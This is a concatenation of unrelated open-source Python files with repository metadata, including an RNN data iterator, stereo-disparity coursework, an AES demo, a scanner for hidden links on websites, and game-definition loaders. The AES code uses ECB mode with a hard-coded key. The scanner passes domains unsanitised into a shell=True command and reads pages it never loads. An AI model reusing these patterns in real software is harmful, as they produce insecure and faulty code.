0:\n\t\t\t\t\tcontinue\n\n\t\t\t\ttgs[self.delay:] = tgs[:-self.delay]\n\t\t\t\ttgs[:self.delay] = tgs[0]\n\n\t\t\t\tself.features.append(feats)\n\t\t\t\tself.labels.append(tgs+1)\n\t\t\t\tself.utt_ids.append(utt_id)\n\t\t\t\tseq_len_tot += feats.shape[0]\n\n\t\t\tsys.stderr.write('\t%d sequences loaded...\\n' % len(self.features))\n\t\t\tsys.stderr.write('\t%d utterances loaded...\\n' % len(self.utt_ids))\n\t\t\tsys.stderr.write('\tavg-sequence-len = %.0f\\n' % (seq_len_tot/len(self.utt_ids)))\n\n\tdef _make_data_plan(self):\n\t\tif self.do_shuffling:\n\t\t\t# TODO: should we group utterances of similar length together?\n\t\t\tself._data_plan = np.random.permutation(len(self.features))\n\t\telse:\n\t\t\t# we might not want to do shuffling for testing for example\n\t\t\tself._data_plan = np.arange(len(self.features))\n\n\tdef __iter__(self):\n\t\tassert len(self._data_plan) >= self.batch_size, \\\n\t\t\t\"Total number of sentences smaller than batch size, consider using smaller batch size\"\n\t\tutt_idx = 
self._data_plan[:self.batch_size]\n\t\tutt_inside_idx = [0] * self.batch_size\n\n\t\tnext_utt_idx = self.batch_size\n\t\tis_pad = [False] * self.batch_size\n\t\tpad = 0\n\n\t\tnp_data_buffer = np.zeros((self.batch_size, self.truncate_len, self.feat_dim))\n\t\tnp_label_buffer = np.zeros((self.batch_size, self.truncate_len, self.label_dim))\n\t\tutt_id_buffer = [None] * self.batch_size\n\n\t\tdata_names = [self.data_name] + self.init_state_names\n\t\tlabel_names = [self.label_name]\n\n\t\t# reset states\n\t\tfor state in self.init_state_arrays:\n\t\t\tstate[:] = 0.1\n\n\t\twhile True:\n\t\t\teffective_sample_count = self.batch_size * self.truncate_len\n\t\t\tfor i, idx in enumerate(utt_idx):\n\t\t\t\tfea_utt = self.features[idx]\n\t\t\t\tif utt_inside_idx[i] >= fea_utt.shape[0]:\n\t\t\t\t\t# we have consumed this sentence\n\n\t\t\t\t\t# reset the states\n\t\t\t\t\tfor state in self.init_state_arrays:\n\t\t\t\t\t\tstate[i:i+1] = 0.1\n\t\t\t\t\t# load new sentence\n\t\t\t\t\tif is_pad[i]:\n\t\t\t\t\t\t# I am already a padded sentence, just rewind to the\n\t\t\t\t\t\t# beginning of the sentence\n\t\t\t\t\t\tutt_inside_idx[i] = 0\n\t\t\t\t\telif next_utt_idx >= len(self.features):\n\t\t\t\t\t\t# we consumed the whole dataset, simply repeat this sentence\n\t\t\t\t\t\t# and set pad\n\t\t\t\t\t\tpad += 1\n\t\t\t\t\t\tis_pad[i] = True\n\t\t\t\t\t\tutt_inside_idx[i] = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\t# move to the next sentence\n\t\t\t\t\t\tutt_idx[i] = self._data_plan[next_utt_idx]\n\t\t\t\t\t\tidx = utt_idx[i]\n\t\t\t\t\t\tfea_utt = self.features[idx]\n\t\t\t\t\t\tutt_inside_idx[i] = 0\n\t\t\t\t\t\tnext_utt_idx += 1\n\n\t\t\t\tif is_pad[i] and self.pad_zeros:\n\t\t\t\t\tnp_data_buffer[i] = 0\n\t\t\t\t\tnp_label_buffer[i] = 0\n\t\t\t\t\teffective_sample_count -= self.truncate_len\n\t\t\t\telse:\n\t\t\t\t\tidx_take = slice(utt_inside_idx[i],\n\t\t\t\t\t\t\t\t\t min(utt_inside_idx[i]+self.truncate_len,\n\t\t\t\t\t\t\t\t\t\t fea_utt.shape[0]))\n\t\t\t\t\tn_take = idx_take.stop - idx_take.start\n\t\t\t\t\tnp_data_buffer[i][:n_take] = fea_utt[idx_take]\n\t\t\t\t\tnp_label_buffer[i][:n_take] = self.labels[idx][idx_take]\n\t\t\t\t\tif n_take < self.truncate_len:\n\t\t\t\t\t\tnp_data_buffer[i][n_take:] = 0\n\t\t\t\t\t\tnp_label_buffer[i][n_take:] = 0\n\t\t\t\t\t\teffective_sample_count -= self.truncate_len - n_take\n\n\t\t\t\t\tutt_inside_idx[i] += n_take\n\n\t\t\t\tutt_id_buffer[i] = self.utt_ids[idx]\n\n\t\t\tif pad == self.batch_size:\n\t\t\t\t# finished all the sentences\n\t\t\t\tbreak\n\n\t\t\tself.data[0][:] = np_data_buffer\n\t\t\tself.label[0][:] = np_label_buffer\n\t\t\tdata_batch = SimpleBatch(data_names, self.data + self.init_state_arrays,\n\t\t\t\t\t\t\t\t\t label_names, self.label, bucket_key=None,\n\t\t\t\t\t\t\t\t\t utt_id=utt_id_buffer,\n\t\t\t\t\t\t\t\t\t effective_sample_count=effective_sample_count)\n\n\t\t\t# Instead of using the 'pad' property, we use an array 'is_pad'. Because\n\t\t\t# our padded sentence could be in the middle of a batch. A sample is pad\n\t\t\t# if we are running out of the data set and they are just some previously\n\t\t\t# seen data to be filled for a whole batch. 
In prediction, those data\n\t\t\t# should be ignored\n\t\t\tdata_batch.is_pad = is_pad\n\n\t\t\tyield data_batch\n\n\tdef reset(self):\n\t\tself._make_data_plan()\n\n\nclass SimpleBatch(object):\n\tdef __init__(self, data_names, data, label_names, label, bucket_key,\n\t\t\t\t utt_id=None, utt_len=0, effective_sample_count=None):\n\t\tself.data = data\n\t\tself.label = label\n\t\tself.data_names = data_names\n\t\tself.label_names = label_names\n\t\tself.bucket_key = bucket_key\n\t\tself.utt_id = utt_id\n\t\tself.utt_len = utt_len\n\t\tself.effective_sample_count = effective_sample_count\n\n\t\tself.pad = 0\n\t\tself.index = None # TODO: what is index?\n\n\t@property\n\tdef provide_data(self):\n\t\treturn [(n, x.shape) for n, x in zip(self.data_names, self.data)]\n\n\t@property\n\tdef provide_label(self):\n\t\treturn [(n, x.shape) for n, x in zip(self.label_names, self.label)]\n\n\n\n\n\n\n\n","repo_name":"YiAthena/DNN_TTS","sub_path":"adapt/adapt_hidden/RNN_script/io_util.py","file_name":"io_util.py","file_ext":"py","file_size_in_byte":5901,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"26964905036","text":"# my first attempt, which exceeded the time limit\n# n = int(input())\n# res = []\n# snum = 0\n# for i in range(1,n+1):\n#     for j in range(1,i+1):\n#         if i % j == 0:\n#             res.append(j)\n#     snum += sum(list(set(res)))\n#     res.clear()\n    \n# print(snum)\n\n# simple version\nn = int(input())\n\nfor _ in range(n):\n    num = int(input())\n    res = 0\n    for i in range(1,num+1):\n        res += (num//i)*i\n    print(res)","repo_name":"mafls122/Python_Algorithm","sub_path":"11_Etc/baekjoon_17425_약수의 합.py","file_name":"baekjoon_17425_약수의 합.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38646706062","text":"\"\"\"\nThis file holds the main code for disparity map calculations\n\"\"\"\nimport torch\nimport numpy as np\n\nfrom typing import Callable, Tuple\n\n\ndef calculate_disparity_map(left_img: torch.Tensor,\n                            right_img: torch.Tensor,\n                            block_size: int,\n                            sim_measure_function: Callable,\n                            max_search_bound: int = 50) -> torch.Tensor:\n    \"\"\"\n    Calculate the disparity value at each pixel by searching a small \n    patch around a pixel from the left image in the right image\n\n    Note: \n    1. It is important for this project to follow the convention of search\n        input in left image and search target in right image\n    2. While searching for disparity value for a patch, it may happen that there\n        are multiple disparity values with the minimum value of the similarity\n        measure. In that case we need to pick the smallest disparity value.\n        Please check the numpy's argmin and pytorch's argmin carefully.\n        Example:\n        -- diparity_val -- | -- similarity error --\n        -- 0 | 5 \n        -- 1 | 4\n        -- 2 | 7\n        -- 3 | 4\n        -- 4 | 12\n\n        In this case we need the output to be 1 and not 3.\n    3. The max_search_bound is defined from the patch center.\n\n    Args:\n    - left_img: image from the left stereo camera. Torch tensor of shape (H,W,C).\n        C will be >= 1.\n    - right_img: image from the right stereo camera. 
Torch tensor of shape (H,W,C)\n - block_size: the size of the block to be used for searching between\n left and right image\n - sim_measure_function: a function to measure similarity measure between\n two tensors of the same shape; returns the error value\n - max_search_bound: the maximum horizontal distance (in terms of pixels) \n to use for searching\n Returns:\n - disparity_map: The map of disparity values at each pixel. \n Tensor of shape (H-2*(block_size//2),W-2*(block_size//2))\n \"\"\"\n\n assert left_img.shape == right_img.shape\n disparity_map = torch.zeros(left_img.shape[0] - block_size + 1, left_img.shape[1] - block_size + 1)\n ############################################################################\n # Student code begin\n ############################################################################\n\n for i in range(disparity_map.shape[0]):\n for j in range(disparity_map.shape[1]):\n if j - max_search_bound + 1< 0:\n allowed_limit = j + 1\n else:\n allowed_limit = max_search_bound\n dvals = np.array([])\n for k in range(allowed_limit):\n lpatch = left_img[i:i+block_size, j:j+block_size]\n rpatch = right_img[i:i+block_size, j-k:j-k+block_size]\n dval = sim_measure_function(lpatch, rpatch)\n dvals = np.append(dvals, dval)\n if len(dvals):\n mindval = np.argmin(dvals)\n else:\n mindval = 0\n disparity_map[i][j] = torch.tensor(mindval)\n\n ############################################################################\n # Student code end\n ############################################################################\n return disparity_map\n\ndef calculate_cost_volume(left_img: torch.Tensor,\n right_img: torch.Tensor,\n max_disparity: int,\n sim_measure_function: Callable,\n block_size: int = 9):\n \"\"\"\n Calculate the cost volume. Each pixel will have D=max_disparity cost values\n associated with it. Basically for each pixel, we compute the cost of\n different disparities and put them all into a tensor.\n\n Note: \n 1. It is important for this project to follow the convention of search\n input in left image and search target in right image\n 2. If the shifted patch in the right image will go out of bounds, it is\n good to set the default cost for that pixel and disparity to be something\n high(we recommend 255), so that when we consider costs, valid disparities will have a lower\n cost. \n\n Args:\n - left_img: image from the left stereo camera. Torch tensor of shape (H,W,C).\n C will be 1 or 3.\n - right_img: image from the right stereo camera. Torch tensor of shape (H,W,C)\n - max_disparity: represents the number of disparity values we will consider.\n 0 to max_disparity-1\n - sim_measure_function: a function to measure similarity measure between\n two tensors of the same shape; returns the error value\n - block_size: the size of the block to be used for searching between\n left and right image\n Returns:\n - cost_volume: The cost volume tensor of shape (H,W,D). H,W are image\n dimensions, and D is max_disparity. cost_volume[x,y,d] \n represents the similarity or cost between a patch around left[x,y] \n and a patch shifted by disparity d in the right image. 
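calculate_disparity_map above takes sim_measure_function as an unspecified Callable whose result it minimizes, so any error metric where lower means more similar fits the contract. A sum-of-squared-differences implementation is one plausible choice (an assumption on my part; the record never pins the metric down); it would be passed as sim_measure_function=ssd_error:

import torch

def ssd_error(patch1: torch.Tensor, patch2: torch.Tensor) -> torch.Tensor:
    """Sum of squared differences; lower = more similar, so argmin works."""
    assert patch1.shape == patch2.shape
    return torch.sum((patch1 - patch2) ** 2)

# Identical patches score 0, a mismatched patch scores higher:
a = torch.rand(3, 3, 1)
assert ssd_error(a, a.clone()).item() == 0.0
assert ssd_error(a, a + 1.0).item() > 0.0

Any metric with the same lower-is-better convention (SAD, 1 - NCC) slots in without touching the search loop.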
\n \"\"\"\n #placeholder\n H = left_img.shape[0]\n W = right_img.shape[1]\n cost_volume = torch.zeros(H, W, max_disparity)\n ############################################################################\n # Student code begin\n ############################################################################\n\n for i in range(cost_volume.shape[0]-block_size+1):\n for j in range(cost_volume.shape[1]-block_size+1):\n if j - max_disparity + 1< 0:\n allowed_limit = j + 1\n else:\n allowed_limit = max_disparity\n dvals = torch.zeros(max_disparity)\n for k in range(allowed_limit):\n lpatch = left_img[i:i+block_size, j:j+block_size]\n rpatch = right_img[i:i+block_size, j-k:j-k+block_size]\n # print(lpatch.shape, rpatch.shape, i, j, k, max_disparity)\n dval = sim_measure_function(lpatch, rpatch)\n dvals[k] = int(dval)\n # print(dvals)\n cost_volume[i][j] = dvals\n\n ############################################################################\n # Student code end\n ############################################################################\n return cost_volume\n","repo_name":"shubhamdadhich/Proj5---Disparity-Calculation---CV","sub_path":"proj5_code/disparity_map.py","file_name":"disparity_map.py","file_ext":"py","file_size_in_byte":6239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"29792802324","text":"#!/usr/bin/python3\r\nfrom Crypto.Cipher import AES\r\n\r\n# Padding for the input string --not\r\n# related to encryption itself.\r\nBS = 16 # Bytes\r\ndef pad(s): return s + (BS - len(s) % BS) * chr(BS - len(s) % BS)\r\ndef unpad(s): return s[:-ord(s[len(s)-1:])]\r\n\r\n\r\nclass AESCipher:\r\n def __init__(self, pol, jor):\r\n self.pol = pol\r\n self.jor = jor\r\n\r\n def encrypt(self, raw):\r\n \"\"\"\r\n Returns hex encoded encrypted value!\r\n \"\"\"\r\n raw = pad(raw)\r\n cipher = AES.new(self.pol, AES.MODE_ECB)\r\n encrypted = cipher.encrypt(raw.encode())\r\n # print(type(msg))\r\n return encrypted.hex() # .encode('hex')\r\n\r\n def decrypt(self, enc):\r\n \"\"\"\r\n Requires hex encoded param to decrypt\r\n \"\"\"\r\n enc = bytes.fromhex(enc) # .decode('hex')\r\n cipher = AES.new(self.pol, AES.MODE_ECB)\r\n decrypted = cipher.decrypt(enc)\r\n return unpad(decrypted.decode())\r\n\r\n\r\nkey = b'abcdefghijklmnop'\r\nmsg = 'Satrio_Ropel'\r\n\r\nc = AESCipher(key, msg)\r\nciphertext = c.encrypt(msg)\r\nplaintext = c.decrypt(ciphertext)\r\nprint(\"Ini adalah Ciphertextnya : \", ciphertext)\r\nprint(\"Ini adalah Plaintextnya : \", plaintext)\r\n","repo_name":"satriowibowo1701/AES-ECB-encrypt-and-decrypt","sub_path":"ecb.py","file_name":"ecb.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"35235301967","text":"#!/usr/bin/python3\n# coding: utf-8\n\nimport re\nimport os\nimport argparse\nimport subprocess\nimport threading\nfrom fake_useragent import UserAgent\nfrom urllib.parse import quote\nfrom termcolor import cprint\nfrom urllib.parse import urlparse\n\nfrom selenium.webdriver import Chrome\nfrom selenium.webdriver.chrome.options import Options\n\nreconpath = \"recon_domains\"\nscopepath = \"scope_domains\"\n\n# 子域名文件\nsubfinder_file = \"_subfinder.txt\"\nshuffledns_file = \"_shuffledns.txt\"\nrapiddns_file = \"_rapiddns.txt\"\n# 验证结果文件\nsub_file_ok = \"_sub_ok.txt\"\n# 去重后文件\nanew_file = \"_anew_file.txt\"\n# 各个域名对应标题、状态码等信息文件\ntitle_file = \"_title.txt\"\n\nopt = Options()\nopt.add_argument('--no-sandbox') # 
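Once calculate_cost_volume above has filled the (H, W, D) tensor, the per-pixel disparity is just the argmin over the last axis, which should agree with calculate_disparity_map inside the valid region. A sketch (my addition, using the tie example from the record's own docstring):

import torch

def disparity_from_cost_volume(cost_volume: torch.Tensor) -> torch.Tensor:
    # Recent PyTorch returns the first minimal index on ties, matching the
    # smallest-disparity tie-break the record asks for; verify on your
    # version, as the docstring's numpy-vs-torch argmin warning suggests.
    return torch.argmin(cost_volume, dim=2)

vol = torch.tensor([[[5., 4., 7., 4., 12.]]])   # the docstring's tie example
assert disparity_from_cost_volume(vol).item() == 1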
解决DevToolsActivePort文件不存在的报错\nopt.add_argument('window-size=1920x3000') # 设置浏览器分辨率\nopt.add_argument('--disable-gpu') # 谷歌文档提到需要加上这个属性来规避bug\nopt.add_argument('--hide-scrollbars') # 隐藏滚动条,应对一些特殊页面\nopt.add_argument('blink-settings=imagesEnabled=false') # 不加载图片,提升运行速度\nopt.add_argument('--headless') # 浏览器不提供可视化界面。Linux下如果系统不支持可视化不加这条会启动失败\nopt.add_experimental_option('excludeSwitches', ['enable-logging']) # 关闭DevTools listening on ws://127.0.0.1 日志\n\ndef radSpider(targetDomain, saveDir):\n # 爬虫\n scanCommand = \"echo {0}|./httpx -silent -mc 200,301,302 -threads -1000 |./hakrawler -d 2 -subs > {1}\".format(targetDomain, saveDir+\"domain_js.txt\")\n print(\"\\033[1;33m command>>>>>> \\033[0m\",\"\\033[1;33m\"+ scanCommand +\"\\033[0m\")\n finderjs_result = subprocess.Popen(scanCommand, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)\n finderjs_result.wait()\n\ndef All_JC(urls):\n for url in urls:\n try:\n driver = Chrome(options=opt) # 创建无界面对象\n respose = driver.page_source\n driver.close()\n rules = [] # 匹配到的标签\n host = True\n for re_rules in re_rules_list:\n chashuibiao = re.findall(r'{}'.format(re_rules), respose, re.S | re.I)\n if chashuibiao:\n rules.append(re_rules)\n host = False\n if host is False:\n with open(\"result.txt\", \"a\") as file:\n file.write('\\t地址:{}\\n\\t匹配项:{}\\n\\n'.format(url, rules))\n print('{}:{} 存在暗链!'.format(threading.current_thread().name, url))\n else:\n print('{}:{} 未检测出'.format(threading.current_thread().name, url))\n except Exception as e:\n print('{}:{}请求出错'.format(threading.current_thread().name, url))\n\ndef logo():\n logo = '''\n $$\\ \n $$ | \n $$$$$$\\ $$ |$$\\ $$$$$$$\\ $$$$$$$\\ $$$$$$$\\ $$$$$$\\ $$$$$$$\\ \n \\____$$\\ $$ |\\__|$$ _____|$$ _____|$$ _____|\\____$$\\ $$ __$$\\ \n $$$$$$$ |$$ |$$\\ $$ / \\$$$$$$\\ $$ / $$$$$$$ |$$ | $$ |\n$$ __$$ |$$ |$$ |$$ | \\____$$\\ $$ | $$ __$$ |$$ | $$ |\n\\$$$$$$$ |$$ |$$ |\\$$$$$$$\\ $$$$$$$ |\\$$$$$$$\\\\$$$$$$$ |$$ | $$ |\n \\_______|\\__|$$ | \\_______|\\_______/ \\_______|\\_______|\\__| \\__|\n $$\\ $$ | \n \\$$$$$$ | \n \\______/ \n Author:tom v1.2\n '''\n return logo\n\nwith open('rules.txt', 'r', encoding='utf-8') as s:\n re_rules_list = s.read().split('\\n')\n\ndef main():\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument('--targets', default='targets.txt',\n help='information gathering for SubDomain')\n parser.add_argument('--files', default='files',\n help='Save subDomain info to Files')\n parser.add_argument('--outname', default='test',\n help='Save outname')\n parser.add_argument('--Thread', action='store',\n type=int, default=20,\n help='Thread')\n parser.add_argument('--aljc', action='store',\n type=bool, default=False,\n help='Scan for sensitive words')\n parser.add_argument('--aljcall', action='store',\n type=bool, default=False,\n help='Scan for all sensitive words')\n\n args = parser.parse_args()\n print(args.targets)\n\n try:\n print(logo())\n saveDir = \"{}/{}/{}/\".format(os.path.dirname(os.path.abspath(__file__)), reconpath, args.files)\n\n if args.aljc:\n with open(args.targets, \"r+\") as f:\n urls_list = f.read().split('\\n')\n All_JC(urls_list)\n\n if args.aljcall:\n xc = args.Thread\n with open(args.targets, \"r\") as f:\n for i in f.readlines():\n domain = i.strip(\"\\n\")\n with open(\"result.txt\", \"a\") as file:\n file.write('目标地址:------------------({})------------------\\n\\n'.format(domain))\n radSpider(domain, saveDir)\n if os.path.exists(saveDir + \"domain_js.txt\"):\n with open(saveDir + \"domain_js.txt\", 'r') 
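For context, the Chinese comments above document the headless-Chrome flags: work around the missing-DevToolsActivePort error, fix the window size, disable the GPU per the Chrome docs, hide scrollbars for unusual pages, skip image loading for speed, run headless, and silence the "DevTools listening" log. Separately, All_JC constructs a driver and reads page_source without ever calling driver.get(url) (and misspells respose), so every rule check runs against a blank page. A hedged corrected sketch of the per-URL check; the helper name and rule argument are mine, not the record's:

import re
from selenium.webdriver import Chrome
from selenium.webdriver.chrome.options import Options

def check_url(url: str, rules: list) -> list:
    opt = Options()
    opt.add_argument('--headless')
    driver = Chrome(options=opt)
    try:
        driver.get(url)              # the navigation step the record omits
        html = driver.page_source
    finally:
        driver.quit()                # always release the browser process
    return [r for r in rules if re.findall(r, html, re.S | re.I)]

The try/finally also guarantees cleanup when a request raises, which the record's linear close() call does not.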
as f:\n urls_list = f.read().split('\\n')\n urls = []\n twoList = [[] for i in range(xc)]\n for i, e in enumerate(urls_list):\n twoList[i % xc].append(e)\n for i in twoList:\n urls.append(i)\n thread_list = [threading.Thread(target=All_JC, args=(urls[i],)) for i in range(len(urls))]\n for t in thread_list:\n t.start()\n for t in thread_list:\n t.join()\n\n except Exception as e:\n print(e)\n pass\n\nif __name__ == '__main__':\n main()\n","repo_name":"pantom2077/aljcscan","sub_path":"aljcscan.py","file_name":"aljcscan.py","file_ext":"py","file_size_in_byte":6212,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"27"} +{"seq_id":"43008863780","text":"import logging\nimport traceback\nclass InvalidArgumentException(Exception):\n pass\n\n\ndef add(v1, v2):\n print(f\"add -- (1) v1: {v1}, v2: {v2}\")\n if v1 is None or v2 is None:\n raise InvalidArgumentException(\"일부러 터트렸습니다!\")\n print(f\"add -- (2) v1: {v1}, v2: {v2}\")\n\n\ndef div(v1, v2):\n print(f\"add -- (1) v1: {v1}, v2: {v2}\")\n if v1 is None or v2 is None:\n raise ZeroDivisionError(\"0으로 나눌수 없습니다!\")\n print(f\"add -- (2) v1: {v1}, v2: {v2}\")\n\n\nif __name__ == '__main__':\n try:\n print(\"Hello Python World!\")\n add(1, 2)\n add(1, None)\n print(\"try 끝점까지 도달했습니다.\")\n logging.basicConfig()\n except (InvalidArgumentException, ZeroDivisionError) as e:\n print(e)\n print(\"예외처리를 시작합니다\")\n else:\n print(\"ELSE\")\n finally:\n print(\"!\")\n\n print(\"프로그램을 종료합니다.\")\n","repo_name":"ej31/python-learning-archive","sub_path":"learning_230823/study/study_fileio_1.py","file_name":"study_fileio_1.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"37949646283","text":"import re\n\nfrom nofloat import to_int\nfrom lib.log import debug, warning\nfrom lib.defs import preprocess\n\n\nclass _Definitions:\n\n int_properties = ()\n precision_properties = ()\n int_list_properties = ()\n precision_list_properties = ()\n string_properties = ()\n\n def __init__(self):\n self._dict = {}\n\n def read(self, s):\n s = preprocess(s)\n d = self._dict\n for line in s.split(\"\\n\"):\n words = line.split()\n if not words: continue\n if words[0] == \"clear\":\n d.clear()\n elif words[0] == \"def\":\n name = words[1]\n if name not in d:\n d[name] = {}\n elif words[0] in self.string_properties:\n d[name][words[0]] = words[1]\n elif words[0] in self.int_properties:\n d[name][words[0]] = int(words[1])\n elif words[0] in self.precision_properties:\n d[name][words[0]] = to_int(words[1])\n elif words[0] in self.int_list_properties:\n d[name][words[0]] = [int(x) for x in words[1:]]\n elif words[0] in self.precision_list_properties:\n d[name][words[0]] = [to_int(x) for x in words[1:]]\n else:\n if words[0] == \"effect\" and words[1] == \"bonus\" and words[2] in self.precision_properties:\n words[3] = to_int(words[3])\n if len(words) > 4: # apparently this case doesn't happen at the moment\n words[4] = to_int(words[4])\n d[name][words[0]] = words[1:]\n\n def apply_inheritance(self, expanded_is_a=False):\n d = self._dict\n modified = True\n n = 0\n while modified:\n modified = False\n n += 1\n debug(\"*** pass %s ***\", n)\n # for every object\n for ko, o in d.items():\n if o.has_key(\"is_a\"):\n # init \"expanded_is_a\" (first pass)\n if expanded_is_a and not o.has_key(\"expanded_is_a\"):\n o[\"expanded_is_a\"] = o[\"is_a\"][:]\n debug(\"%s.%s = %s\", ko, \"expanded_is_a\", o[\"expanded_is_a\"])\n modified = True\n # for 
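The thread fan-out in main() above builds twoList by round-robin assignment (twoList[i % xc].append(e)) and then copies it element-for-element into urls before spawning one thread per bucket, so the copy loop is redundant. The same logic as a small standalone helper (names are mine, not the record's):

import threading

def round_robin(items, n):
    buckets = [[] for _ in range(n)]
    for i, item in enumerate(items):
        buckets[i % n].append(item)
    return buckets

def run_threads(urls, n, worker):
    # one thread per non-empty bucket, started together and joined together
    threads = [threading.Thread(target=worker, args=(chunk,))
               for chunk in round_robin(urls, n) if chunk]
    for t in threads:
        t.start()
    for t in threads:
        t.join()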
every parent\n for p in o[\"is_a\"]:\n if p in d:\n # for every attribute\n for k, v in d[p].items():\n if expanded_is_a and k == \"expanded_is_a\":\n # add parents from \"expanded_is_a\" of parent\n # (if not yet in the object's \"expanded_is_a\")\n for is_a in v:\n if is_a not in o[k]:\n o[k] += [is_a]\n debug(\"%s.%s = %s\", ko, k, o[k])\n modified = True\n elif k in d[p] and k not in o:\n # copy attribute from parent\n o[k] = v\n debug(\"%s.%s = %s\", ko, k, o[k])\n modified = True\n else:\n warning(\"error in %s.is_a: %s doesn't exist\", ko, p)\n\n def _val(self, obj, attr):\n d = self._dict\n if not d.has_key(obj):\n return\n o = d[obj]\n if not o.has_key(attr):\n if o.has_key(\"is_a\"):\n for p in o[\"is_a\"]:\n if d.has_key(p) and self._val(p, attr) is not None:\n return self._val(p, attr)\n return\n return o[attr]\n\n def get(self, obj, attr):\n d = self._dict\n v = self._val(obj, attr)\n if v is None and attr[-8:-1] == \"_level_\":\n v = self._val(obj, attr[:-8])\n if isinstance(v, list):\n v = v[:]\n return v\n\n def get_dict(self, obj):\n return self._dict[obj]\n\n def classnames(self):\n return self._dict.keys()\n\n def copy(self, other):\n self._dict = other._dict\n\n\n_precision_properties = (\n \"armor\",\n \"damage\",\n \"damage_radius\", \"range\",\n \"decay\",\n \"qty\", \"extraction_qty\",\n \"hp_max\",\n \"mana_cost\", \"mana_max\",\n \"extraction_time\",\n \"time_cost\",\n \"cooldown\",\n \"mana_regen\",\n \"speed\", \n )\n_precision_properties_extended = []\nfor _ in _precision_properties:\n _precision_properties_extended.extend((_, _ + \"_bonus\"))\nassert \"armor\" in _precision_properties_extended\nassert \"armor_bonus\" in _precision_properties_extended\n\n\nclass Rules(_Definitions):\n\n string_properties = (\"airground_type\",)\n int_properties = (\n \"collision\",\n \"corpse\",\n \"food_cost\", \"food_provided\",\n \"harm_level\",\n \"heal_level\",\n \"resource_type\",\n \"is_repairable\", \"is_healable\", \"is_vulnerable\",\n \"is_undead\",\n \"is_a_building_land\",\n \"is_buildable_anywhere\",\n \"special_range\",\n \"sight_range\",\n \"transport_capacity\",\n \"transport_volume\",\n \"is_invisible\",\n \"is_cloakable\",\n \"is_a_detector\",\n \"is_a_cloaker\",\n \"universal_notification\",\n \"presence\",\n \"provides_survival\",\n \"is_ballistic\",\n \"is_teleportable\",\n )\n precision_properties = _precision_properties_extended\n int_list_properties = (\"storable_resource_types\",)\n precision_list_properties = (\"cost\", \"storage_bonus\")\n\n def load(self, *strings):\n self._dict = {}\n for s in strings:\n s = re.sub(r\"^[ \\t]*class +faction\\b\", \"class race\", s, flags=re.M)\n self.read(s)\n self.apply_inheritance(expanded_is_a=True)\n\n def classnames(self):\n result = _Definitions.classnames(self)\n result.remove(\"parameters\")\n return result\n\n\nclass Style(_Definitions):\n\n def __init__(self):\n self._style_warnings = []\n \n def load(self, *strings):\n self._dict = {}\n for s in strings:\n self.read(s)\n self.apply_inheritance()\n\n def get(self, obj, attr, warn_if_not_found=True):\n result = _Definitions.get(self, obj, attr)\n if result is None and warn_if_not_found:\n result = [] # the caller might expect a list\n if (obj, attr) not in self._style_warnings:\n self._style_warnings.append((obj, attr))\n warning(\"no value found for %s.%s (check style.txt)\", obj, attr)\n return result\n\n def has(self, obj, attr):\n return self.get(obj, attr, False) is not None\n\n\n# AI (probably completely separate)\n\ndef _read_ai_to_dict(s, d):\n s = 
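The apply_inheritance method above is a fixed-point loop: it keeps copying attributes from parents until a full pass over all objects changes nothing, so multi-level is_a chains eventually settle. A toy Python 3 illustration of the same idea (the record itself is Python 2, note has_key and iteritems elsewhere in this dump):

# Each definition may name parents in "is_a"; missing attributes are
# inherited. Loop until a whole pass makes no change (the fixed point).
defs = {
    "archer": {"is_a": ["unit"], "range": 7},
    "unit":   {"is_a": ["thing"], "speed": 2},
    "thing":  {"hp": 10},
}

changed = True
while changed:
    changed = False
    for name, obj in defs.items():
        for parent in obj.get("is_a", []):
            for key, val in defs.get(parent, {}).items():
                if key != "is_a" and key not in obj:
                    obj[key] = val
                    changed = True

assert defs["archer"] == {"is_a": ["unit"], "range": 7, "speed": 2, "hp": 10}

The second pass is what propagates "hp" from thing through unit to archer; a single pass would miss grandparent attributes depending on iteration order.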
preprocess(s)\n name = None\n for line in s.split(\"\\n\"):\n words = line.split()\n if not words: continue\n if words[0] == \"def\":\n name = words[1]\n d[name] = []\n elif name is not None:\n d[name] += [line]\n else:\n warning(\"'def ' is missing (check ai.txt)\")\n\n_ai = {}\n\ndef load_ai(*strings):\n global _ai\n _ai = {}\n for s in strings:\n _read_ai_to_dict(s, _ai)\n\ndef get_ai(name):\n return _ai[name]\n\ndef get_ai_names():\n return _ai.keys()\n\n# define two convenient variables\n\nrules = Rules()\nstyle = Style()\n","repo_name":"sanslash332/soundrts","sub_path":"soundrts/definitions.py","file_name":"definitions.py","file_ext":"py","file_size_in_byte":7895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"38895157077","text":"# for pagination, we need to get the next page link and then parse the links from that page.\n\nimport httpx\nfrom selectolax.parser import HTMLParser\nfrom dataclasses import dataclass\nfrom urllib.parse import urljoin\nfrom rich import print\nimport json\nimport csv\n\n@dataclass\nclass Product:\n name: str\n sku: str\n price: str\n rating: str # store the html for now. all are SVGs. looks sussy \n\n@dataclass\nclass Response:\n body_html: HTMLParser\n next_page: str\n\ndef get_page(client, url, n):\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\"\n }\n urlPage = url[:-1] + f\"{n}\" \n r = client.get(urlPage, headers=headers)\n html = HTMLParser(r.text)\n # check if the current page is in range by checking for presence of a div with the data-qa attribute of hits\n if html.css_first(\"div[data-qa=hits]\"):\n next_page = url[:-1] + f\"{n+1}\"\n print(next_page)\n else:\n next_page = \"None\"\n return Response(body_html=html, next_page=next_page)\n\ndef parse_listings(html):\n listings = html.css(\"div[data-qa=hits] > div > div > div > a\")\n return set(link.attrs[\"href\"] for link in 